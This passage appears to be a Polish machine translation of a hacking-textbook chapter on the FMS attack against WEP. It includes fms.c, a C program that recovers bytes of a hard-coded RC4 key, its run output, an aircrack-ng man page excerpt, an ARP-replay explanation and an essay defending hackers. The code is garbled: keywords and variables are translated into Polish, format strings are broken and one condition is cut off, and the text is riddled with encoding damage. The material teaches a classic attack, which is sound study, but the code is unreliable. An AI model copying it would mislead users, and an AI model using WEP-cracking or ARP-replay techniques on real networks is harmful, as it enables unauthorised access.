6 - 3 - 1 = 2

Ponownie okre�la si� poprawny bajt klucza. Oczywi�cie ze wzgl�du na demonstracj� warto�ci X zosta�y strategicznie wybrane. Aby da� Ci prawdziwe poczucie statystycznej natury ataku na pe�n� implementacj� RC4, do��czono nast�puj�cy kod �r�d�owy:

Powr�t

08.11.2020

fms.c

#include < stdio.h >

/ * Szyfr strumieniowy RC4 * /

int RC4 (int * IV, int * key) {

int K [256];

int S [256];

int seed [16];

int i, j, k, t;

// Seed = IV + klawisz;

for (k = 0; k <3; k ++)

seed[k] = IV [k];

dla (k = 0; k <13; k ++)

seed [k + 3] = klucz [k];

// - = Algorytm planowania klucza (KSA) = -

// Inicjalizuj tablice.

dla (k = 0; k <256; k ++) {

S [k] = k;

K [k] = ziarno [k% 16];

}

j = 0;

for (i = 0; i <256; i ++) {

j = (j + S [i] + K [i])% 256;

t = S [i]; S [i] = S [j]; S [j] = t; // Zamie� (S [i], S [j]);

}

// Pierwszy krok PRGA dla pierwszego bajtu strumienia klucza

i = 0;

j = 0;

i = i + 1;

j = j + S [i];

t = S [i]; S [i] = S [j]; S [j] = t; // Zamie� (S [i], S [j]);

k = (S [i] + S [j])% 256;

return S [k];

}

int main (int argc, char * argv []) {

int K [256];

int S [256];

int IV [3];

klucz int [13] = {1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213};

int seed [16];

int N = 256;

int i, j, k, t, x, A;

int keystream, keybyte;

int max_result, max_count;

int wyniki [256];

int znane_j, znane_S;

if (argc <2) {

printf ("U�ycie:% s n", argv [0]);

exit (0);

}

A = atoi (argv [1]);

if ((A> 12) || (A <0)) {

printf ("keybyte musi by� od 0 do 12. n");

exit (0);

}

for (k = 0; k <256; k ++)

wyniki [k] = 0;

IV [0] = A + 3;

IV [1] = N - 1;

for (x = 0; x <256; x ++) {

IV [2] = x;

keystream = RC4 (IV, klucz);

printf ("U�ywanie IV: (% d,% d,% d), pierwszy bajt strumienia klucza to% u"

IV [0], IV [1], IV [2], strumie� klucza);

printf ("Wykonywanie pierwszych krok�w% d KSA ..", A + 3);

// Seed = IV + klawisz;

for (k = 0; k <3; k ++)

seed [k] = IV [k];

for(k = 0; k <13; k ++)

seed [k + 3] = klucz [k];

// - = Algorytm planowania klucza (KSA) = -

// Inicjalizuj tablice.

dla (k = 0; k <256; k ++) {

S [k] = k;

K [k] = ziarno [k% 16];

}

j = 0;

for (i = 0; i <(A + 3); i ++) {

j = (j + S [i] + K [i])% 256;

t = S [i];

S [i] = S [j];

S [j] = t;

}

if (j <2) {// Je�li j <2, to S [0] lub S [1] zosta�y zak��cone.

printf ("S [0] lub S [1] zosta�o zak��cone, odrzucaj�c .. n");

} else {

znane_j = j;

znane_S = S [A + 3];

printf ("w iteracji KSA #% d, j =% d i S [% d] =% d

A + 3, znane_j, A + 3, znane_S);

keybyte = strumie� klucza - znane_j - znane_S;

while (keybyte <0)

keybyte = keybyte + 256;

printf ("klucz [% d] przewidywanie =% d -% d -% d =% d

A, keystream, znane_j, znane_S, keybyte);

wyniki [keybyte] = wyniki [keybyte] + 1;

}

}

max_result = -1;

max_count = 0;

for (k = 0; k <256; k ++) {

if (max_count
max_count = wyniki [k];

max_result = k;

}

}

printf ("n Tabela cz�stotliwo�ci dla klucza [% d] (* = najcz�ciej) n", A);

dla (k = 0; k <32; k ++) {

dla (i = 0; i <8; i ++) {

t = k + i * 32;

if (max_result == t)

printf ("% 3d% 2d * |", t, wyniki [t]);

else

printf ("% 3d% 2d |", t, wyniki [t]);

}

printf ("n");

}

printf ("n [Klucz aktualny] = (");

for (k = 0; k <12; k ++)

printf ("% d", klucz [k]);

printf ("% d) n", klawisz [12]);

printf ("klucz [% d] to prawdopodobnie% d", A, max_result);

}

Ten kod wykonuje atak FMS na 128-bitowy WEP (klucz 104-bitowy, 24-bitowy IV), wykorzystuj�c ka�d� mo�liw� warto�� X. Bajt klucza do ataku jest jedynym argumentem, a klucz jest zakodowany na klucz szyk. Poni�szy wynik pokazuje kompilacj� i wykonanie kodu fms.c do z�amania klucza RC4.

reader@hacking:~/booksrc $ gcc -o fms fms.c

reader@hacking:~/booksrc $ ./fms

Usage: ./fms

reader@hacking:~/booksrc $ ./fms 0

Using IV: (3, 255, 0), first keystream byte is 7

Doing the first 3 steps of KSA.. at KSA iteration #3, j=5 and S[3]=1

key[0] prediction = 7 - 5 - 1 = 1

Using IV: (3, 255, 1), first keystream byte is 211

Doing the first 3 steps of KSA.. at KSA iteration #3, j=6 and S[3]=1

key[0] prediction = 211 - 6 - 1 = 204

Using IV: (3, 255, 2), first keystream byte is 241

Doing the first 3 steps of KSA.. at KSA iteration #3, j=7 and S[3]=1

key[0] prediction = 241 - 7 - 1 = 233

.:[ output trimmed ]:.

Using IV: (3, 255, 252), first keystream byte is 175

Doing the first 3 steps of KSA.. S[0] or S[1] have been disturbed,

discarding..

Using IV: (3, 255, 253), first keystream byte is 149

Doing the first 3 steps of KSA.. at KSA iteration #3, j=2 and S[3]=1

key[0] prediction = 149 - 2 - 1 = 146

Using IV: (3, 255, 254), first keystream byte is 253

Doing the first 3 steps of KSA.. at KSA iteration #3, j=3 and S[3]=2

key[0] prediction = 253 - 3 - 2 = 248

Using IV: (3, 255, 255), first keystream byte is 72

Doing the first 3 steps of KSA.. at KSA iteration #3, j=4 and S[3]=1

key[0] prediction = 72 - 4 - 1 = 67

Tabela cz�stotliwo�ci dla klucza [0] (* = najcz�ciej)

0 1 | 32 3 | 64 0 | 96 1 | 128 2 | 160 0 | 192 1 | 224 3 |

1 10 * | 33 0 | 65 1 | 97 0 | 129 1 | 161 1 | 193 1 | 225 0 |

2 0 | 34 1 | 66 0 | 98 1 | 130 1 | 162 1 | 194 1 | 226 1 |

3 1 | 35 0 | 67 2 | 99 1 | 131 1 | 163 0 | 195 0 | 227 1 |

4 0 | 36 0 | 68 0 | 100 1 | 132 0 | 164 0 | 196 2 | 228 0 |

5 0 | 37 1 | 69 0 | 101 1 | 133 0 | 165 2 | 197 2 | 229 1 |

6 0 | 38 0 | 70 1 | 102 3 | 134 2 | 166 1 | 198 1 | 230 2 |

7 0 | 39 0 | 71 2 | 103 0 | 135 5 | 167 3 | 199 2 | 231 0 |

8 3 | 40 0 | 72 1 | 104 0 | 136 1 | 168 0 | 200 1 | 232 1 |

9 1 | 41 0 | 73 0 | 105 0 | 137 2 | 169 1 | 201 3 | 233 2 |

10 1 | 42 3 | 74 1 | 106 2 | 138 0 | 170 1 | 202 3 | 234 0 |

11 1 | 43 2 | 75 1 | 107 2 | 139 1 | 171 1 | 203 0 | 235 0 |

12 0 | 44 1 | 76 0 | 108 0 | 140 2 | 172 1 | 204 1 | 236 1 |

13 2 | 45 2 | 77 0 | 109 0 | 141 0 | 173 2 | 205 1 | 237 0 |

14 0 | 46 0 | 78 2 | 110 2 | 142 2 | 174 1 | 206 0 | 238 1 |

15 0 | 47 3 | 79 1 | 111 2 | 143 1 | 175 0 | 207 1 | 239 1 |

16 1 | 48 1 | 80 1 | 112 0 | 144 2 | 176 0 | 208 0 | 240 0 |

17 0 | 49 0 | 81 1 | 113 1 | 145 1 | 177 1 | 209 0 | 241 1 |

18 1 | 50 0 | 82 0 | 114 0 | 146 4 | 178 1 | 210 1 | 242 0 |

19 2 | 51 0 | 83 0 | 115 0 | 147 1 | 179 0 | 211 1 | 243 0 |

20 3 | 52 0 | 84 3 | 116 1 | 148 2 | 180 2 | 212 2 | 244 3 |

21 0 | 53 0 | 85 1 | 117 2 | 149 2 | 181 1 | 213 0 | 245 1 |

22 0 | 54 3 | 86 3 | 118 0 | 150 2 | 182 2 | 214 0 | 246 3 |

23 2 | 55 0 | 87 0 | 119 2 | 151 2 | 183 1 | 215 1 | 247 2 |

24 1 | 56 2 | 88 3 | 120 1 | 152 2 | 184 1 | 216 0 | 248 2 |

25 2 | 57 2 | 89 0 | 121 1 | 153 2 | 185 0 | 217 1 | 249 3 |

26 0 | 58 0 | 90 0 | 122 0 | 154 1 | 186 1 | 218 0 | 250 1 |

27 0 | 59 2 | 91 1 | 123 3 | 155 2 | 187 1 | 219 1 | 251 1 |

28 2 | 60 1 | 92 1 | 124 0 | 156 0 | 188 0 | 220 0 | 252 3 |

29 1 | 61 1 | 93 1 | 125 0 | 157 0 | 189 0 | 221 0 | 253 1 |

30 0 | 62 1 | 94 0 | 126 1 | 158 1 | 190 0 | 222 1 | 254 0 |

31 0 | 63 0 | 95 1 | 127 0 | 159 0 | 191 0 | 223 0 | 255 0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)

key[0] is probably 1

reader@hacking:~/booksrc $

reader@hacking:~/booksrc $ ./fms 12

Using IV: (15, 255, 0), first keystream byte is 81

Doing the first 15 steps of KSA.. at KSA iteration #15, j=251 and S[15]=1

key[12] prediction = 81 - 251 - 1 = 85

Using IV: (15, 255, 1), first keystream byte is 80

Doing the first 15 steps of KSA.. at KSA iteration #15, j=252 and S[15]=1

key[12] prediction = 80 - 252 - 1 = 83

Using IV: (15, 255, 2), first keystream byte is 159

Doing the first 15 steps of KSA.. at KSA iteration #15, j=253 and S[15]=1

key[12] prediction = 159 - 253 - 1 = 161

.:[ output trimmed ]:.

Using IV: (15, 255, 252), first keystream byte is 238

Doing the first 15 steps of KSA.. at KSA iteration #15, j=236 and S[15]=1

key[12] prediction = 238 - 236 - 1 = 1

Using IV: (15, 255, 253), first keystream byte is 197

Doing the first 15 steps of KSA.. at KSA iteration #15, j=236 and S[15]=1

key[12] prediction = 197 - 236 - 1 = 216

Using IV: (15, 255, 254), first keystream byte is 238

Doing the first 15 steps of KSA.. at KSA iteration #15, j=249 and S[15]=2

key[12] prediction = 238 - 249 - 2 = 243

Using IV: (15, 255, 255), first keystream byte is 176

Doing the first 15 steps of KSA.. at KSA iteration #15, j=250 and S[15]=1

key[12] prediction = 176 - 250 - 1 = 181

Frequency table for key[12] (* = most frequent)

0 1 | 32 0 | 64 2 | 96 0 | 128 1 | 160 1 | 192 0 | 224 2 |

1 2 | 33 1 | 65 0 | 97 2 | 129 1 | 161 1 | 193 0 | 225 0 |

2 0 | 34 2 | 66 2 | 98 0 | 130 2 | 162 3 | 194 2 | 226 0 |

3 2 | 35 0 | 67 2 | 99 2 | 131 0 | 163 1 | 195 0 | 227 5 |

4 0 | 36 0 | 68 0 | 100 1 | 132 0 | 164 0 | 196 1 | 228 1 |

5 3 | 37 0 | 69 3 | 101 2 | 133 0 | 165 2 | 197 0 | 229 3 |

6 1 | 38 2 | 70 2 | 102 0 | 134 0 | 166 2 | 198 0 | 230 2 |

7 2 | 39 0 | 71 1 | 103 0 | 135 0 | 167 3 | 199 1 | 231 1 |

8 1 | 40 0 | 72 0 | 104 1 | 136 1 | 168 2 | 200 0 | 232 0 |

9 0 | 41 1 | 73 0 | 105 0 | 137 1 | 169 1 | 201 1 | 233 1 |

10 2 | 42 2 | 74 0 | 106 4 | 138 2 | 170 0 | 202 1 | 234 0 |

11 3 | 43 1 | 75 0 | 107 1 | 139 3 | 171 2 | 203 1 | 235 0 |

12 2 | 44 0 | 76 0 | 108 2 | 140 2 | 172 0 | 204 0 | 236 1 |

13 0 | 45 0 | 77 0 | 109 1 | 141 1 | 173 0 | 205 2 | 237 4 |

14 1 | 46 1 | 78 1 | 110 0 | 142 3 | 174 1 | 206 0 | 238 1 |

15 1 | 47 2 | 79 1 | 111 0 | 143 0 | 175 1 | 207 2 | 239 0 |

16 2 | 48 0 | 80 1 | 112 1 | 144 3 | 176 0 | 208 0 | 240 0 |

17 1 | 49 0 | 81 0 | 113 1 | 145 1 | 177 0 | 209 0 | 241 0 |

18 0 | 50 2 | 82 0 | 114 1 | 146 0 | 178 0 | 210 1 | 242 0 |

19 0 | 51 0 | 83 4 | 115 1 | 147 0 | 179 1 | 211 4 | 243 2 |

20 0 | 52 1 | 84 1 | 116 4 | 148 0 | 180 1 | 212 1 | 244 1 |

21 0 | 53 1 | 85 1 | 117 0 | 149 2 | 181 1 | 213 12*| 245 1 |

22 1 | 54 3 | 86 0 | 118 0 | 150 1 | 182 2 | 214 3 | 246 1 |

23 0 | 55 3 | 87 0 | 119 1 | 151 0 | 183 0 | 215 0 | 247 0 |

24 0 | 56 1 | 88 0 | 120 0 | 152 2 | 184 0 | 216 2 | 248 0 |

25 1 | 57 0 | 89 0 | 121 2 | 153 0 | 185 2 | 217 1 | 249 0 |

26 1 | 58 0 | 90 1 | 122 0 | 154 1 | 186 0 | 218 1 | 250 2 |

27 2 | 59 1 | 91 1 | 123 0 | 155 1 | 187 1 | 219 0 | 251 2 |

28 2 | 60 2 | 92 1 | 124 1 | 156 1 | 188 1 | 220 0 | 252 0 |

29 1 | 61 1 | 93 3 | 125 2 | 157 2 | 189 2 | 221 0 | 253 1 |

30 0 | 62 1 | 94 0 | 126 0 | 158 1 | 190 1 | 222 1 | 254 2 |

31 0 | 63 0 | 95 1 | 127 0 | 159 0 | 191 0 | 223 2 | 255 0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)

key[12] is probably 213

reader@hacking:~/booksrc $

Ten typ ataku okaza� si� tak skuteczny, �e nowy protok� bezprzewodowy o nazwie WPA powinien by� stosowany, je�li oczekujesz jakiejkolwiek formy bezpiecze�stwa. Jednak nadal istnieje niesamowita liczba sieci bezprzewodowych chronionych tylko przez WEP. Obecnie istniej� do�� solidne narz�dzia do przeprowadzania atak�w WEP. Jednym z godnych uwagi przyk�ad�w jest aircrack, kt�ry zosta� do��czony do LiveCD; jednak wymaga sprz�tu bezprzewodowego, kt�rego mo�esz nie mie�. Istnieje wiele dokumentacji na temat korzystania z tego narz�dzia, kt�re jest stale rozwijane. Pierwsza strona podr�cznika powinna Ci� uruchomi�.

AIRCRACK-NG(1) AIRCRACK-NG(1)

NAME

aircrack-ng is a 802.11 WEP / WPA-PSK key cracker.

SYNOPSIS

aircrack-ng [options] <.cap / .ivs file(s)>

DESCRIPTION

aircrack-ng is a 802.11 WEP / WPA-PSK key cracker. It implements the socalled

Fluhrer - Mantin - Shamir (FMS) attack, along with some new attacks

by a talented hacker named KoreK. When enough encrypted packets have been

gathered, aircrack-ng can almost instantly recover the WEP key.

OPTIONS

Common options:

-a < amode >

Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.

-e < essid >

Select the target network based on the ESSID. This option is also

required for WPA cracking if the SSID is cloacked.

Ponownie skonsultuj si� z Internetem w sprawie problem�w ze sprz�tem. Ten program spopularyzowa� sprytn� technik� gromadzenia IV. Oczekiwanie na zgromadzenie wystarczaj�cej ilo�ci IV z pakiet�w zaj�oby godziny, a nawet dni. Ale poniewa� sie� bezprzewodowa jest nadal sieci�, b�dzie ruch ARP. Poniewa� szyfrowanie WEP nie zmienia rozmiaru pakietu, �atwo jest wybra�, kt�re z nich s� ARP. Ten atak przechwytuje zaszyfrowany pakiet, kt�ry jest wielko�ci� ��dania ARP, a nast�pnie powtarza go do sieci tysi�ce razy. Za ka�dym razem pakiet jest deszyfrowany i wysy�any do sieci, a odpowiednia odpowied� ARP jest wysy�ana z powrotem. Te dodatkowe odpowiedzi nie szkodz� sieci; jednak generuj� oddzielny pakiet z nowym IV. Wykorzystuj�c t� technik� �askotania sieci, wystarczaj�c� liczb� IV do z�amania klucza WEP mo�na zebra� w ci�gu kilku minut.

Powr�t

09.11.2020

KONKLUZJA

Hacking wydaje si� by� �le rozumianym tematem, a media lubi� sensacje, co tylko pogarsza ten stan. Zmiany w terminologii by�y w wi�kszo�ci nieskuteczne - potrzebna jest zmiana nastawienia. Hakerzy to tylko ludzie o innowacyjnym duchu i dog��bnej znajomo�ci technologii. Hakerzy niekoniecznie s� kryminalistami, cho� tak d�ugo, jak przest�pstwo ma potencja�, by p�aci�, zawsze znajd� si� tacy przest�pcy, kt�rzy s� hakerami. Nie ma nic z�ego w samej wiedzy haker�w, pomimo jej potencjalnych zastosowa�. Chcesz, czy nie, w oprogramowaniu i sieciach istniej� luki w zabezpieczeniach, od kt�rych �wiat zale�y z dnia na dzie�. To po prostu nieunikniony rezultat szybkiego tempa tworzenia oprogramowania. Nowe oprogramowanie cz�sto odnosi sukcesy na pocz�tku, nawet je�li wyst�puj� luki. Ten sukces oznacza pieni�dze, kt�re przyci�gaj� przest�pc�w, kt�rzy ucz� si� wykorzystywa� te luki w celu uzyskania korzy�ci finansowych. Wygl�da na to, �e by�aby to nieko�cz�ca si� spirala w d�, ale na szcz�cie wszyscy ludzie, kt�rzy znale�li luki w oprogramowaniu, nie s� z�o�liwymi przest�pcami nastawionymi na zysk. Ci ludzie s� hakerami, ka�dy z w�asnymi motywami; niekt�rzy kieruj� si� ciekawo�ci�, inni s� wynagradzani za swoj� prac�, jeszcze inni staj� po prostu przed wyzwaniem, a kilku jest w rzeczywisto�ci przest�pcami. Wi�kszo�� tych ludzi nie ma z�ych zamiar�w; zamiast tego pomagaj� sprzedawcom naprawi� ich wra�liwe oprogramowanie. Bez haker�w luki i dziury w oprogramowaniu pozosta�yby nieodkryte. Niestety, system prawny jest powolny i przewa�nie ignoruje technologi�. Cz�sto zdarzaj� si� drako�skie prawa i wydawane s� nadmierne zdania, aby odstraszy� ludzi od uwa�nego ogl�dania. Jest to dziecinna logika, kt�ra zniech�ca haker�w do odkrywania i szukania luk w zabezpieczeniach kt�ra niczego nie rozwi�zuje. Przekonanie wszystkich, �e cesarz ma na sobie fantazyjne nowe ubrania, nie zmienia rzeczywisto�ci, w kt�rej jest nagi. Nieodkryte luki czekaj� na kogo� o wiele bardziej z�o�liwego ni� przeci�tny haker do ich odkrycia. Niebezpiecze�stwo luk w oprogramowaniu polega na tym, �e �adunek mo�e by� czymkolwiek. Replikacja robak�w internetowych jest stosunkowo �agodna w por�wnaniu ze scenariuszami koszmaru terroryzmu, kt�rego tak obawiaj� si� te prawa. Ograniczenie haker�w do praw mo�e zwi�kszy� prawdopodobie�stwo najgorszych scenariuszy, poniewa� pozostawia wi�cej nieodkrytych luk do wykorzystania przez tych, kt�rzy nie s� zwi�zani prawem i chc� wyrz�dzi� prawdziwe szkody. Niekt�rzy mog� twierdzi�, �e gdyby nie by�o haker�w, nie by�oby powodu, aby naprawi� te nieodkryte luki. To jedna perspektywa, ale osobi�cie wol� post�p nad stagnacj�. Hakerzy odgrywaj� bardzo wa�n� rol� w koewolucji technologii. Bez haker�w by�oby niewiele powod�w, aby poprawi� bezpiecze�stwo komputera. Poza tym tak d�ugo, jak pytania "Dlaczego?" i "Co je�li?" s� zadawane, hakerzy zawsze b�d� istnie�. �wiat bez haker�w by�by �wiatem bez ciekawo�ci i innowacji. Technologia zawsze si� zmienia i rozszerza, wi�c zawsze pojawi� si� nowe hacki. W oprogramowaniu zawsze pojawi� si� nowe luki w zabezpieczeniach, dwuznaczno�ci w specyfikacjach protoko��w i mn�stwo innych niedopatrze�. Wiedza zdobyta tu jest tylko punktem wyj�cia. To od ciebie zale�y, czy b�dziesz j� poszerza�, nieustannie zastanawiaj�c si�, jak to dzia�a, zastanawiaj�c si� nad mo�liwo�ciami i my�l�c o rzeczach, o kt�rych tw�rcy nie pomy�leli. Od Ciebie zale�y jak najlepiej wykorzysta� te odkrycia i zastosowa� t� wiedz�, je�li uznasz to za stosowne. Sama informacja nie jest przest�pstwem.

Powr�t

Z Pami�tniczka M�odego Hackerkachacker.pl

Drogi Pami�tniczku …